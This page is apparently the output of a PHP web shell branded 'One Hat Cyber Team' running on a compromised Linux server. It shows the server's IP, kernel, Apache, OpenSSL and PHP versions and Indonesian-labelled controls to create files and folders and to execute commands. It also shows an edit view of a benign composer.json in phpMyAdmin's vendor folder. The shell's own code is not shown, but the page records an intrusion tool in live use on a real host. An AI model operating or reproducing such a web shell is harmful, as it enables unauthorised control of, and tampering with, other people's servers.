One Hat Cyber Team
Your IP :
172.71.120.56
Server IP :
188.114.97.7
Server :
Linux advantage-project 5.14.0-503.26.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 19 16:28:19 UTC 2025 x86_64
Server Software :
Apache/2.4.62 (Rocky Linux) OpenSSL/3.2.2
PHP Version :
8.3.17
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
phpMyAdmin
/
vendor
/
nikic
/
fast-route
/
Edit File:
composer.json
{ "name": "nikic/fast-route", "description": "Fast request router for PHP", "keywords": ["routing", "router"], "license": "BSD-3-Clause", "authors": [ { "name": "Nikita Popov", "email": "nikic@php.net" } ], "autoload": { "psr-4": { "FastRoute\\": "src/" }, "files": ["src/functions.php"] }, "require": { "php": ">=5.4.0" }, "require-dev": { "phpunit/phpunit": "^4.8.35|~5.7" } }
Simpan